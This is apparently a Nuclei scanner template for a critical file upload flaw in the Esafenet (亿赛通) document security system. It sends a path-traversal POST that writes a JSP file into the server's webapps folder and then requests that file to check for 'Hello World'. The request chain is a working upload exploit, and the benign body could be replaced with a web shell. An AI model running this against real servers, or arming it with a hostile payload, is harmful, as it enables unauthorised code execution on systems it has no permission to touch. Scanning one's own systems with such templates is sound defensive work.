id: esafenet_ecryptApplicationService2_upload
info:
  name: 亿赛通 电子文档安全管理系统DecryptApplicationService2
  author: Xc1Ym
  severity: critical
  description: 亿赛通 电子文档安全管理系统DecryptApplicationService2
  tags: upload,OA,hw,esafenet,intrusive

http:
    - method: POST
      path: 
        - "{{RootURL}}/CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/qaxnb.jsp"
      headers:
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
      body: <%out.println("Hello World");%>
    - method: GET
      path:
        - "{{RootURL}}/CDGServer3/qaxnb.jsp"
      matchers:
        - type: word
          words:
            - Hello World
# digest: 490a0046304402205bb603f7ddf8df93812b7c69ec4266c26e6918a1c338ea665f61aec3b8472f3502206899d6ea582b3acd34d4b8c1a750ec7621b4fc7996a69ddbf8f0814792ee3a6a:6b2dd5af372f02ed15a56faf8ad98cf9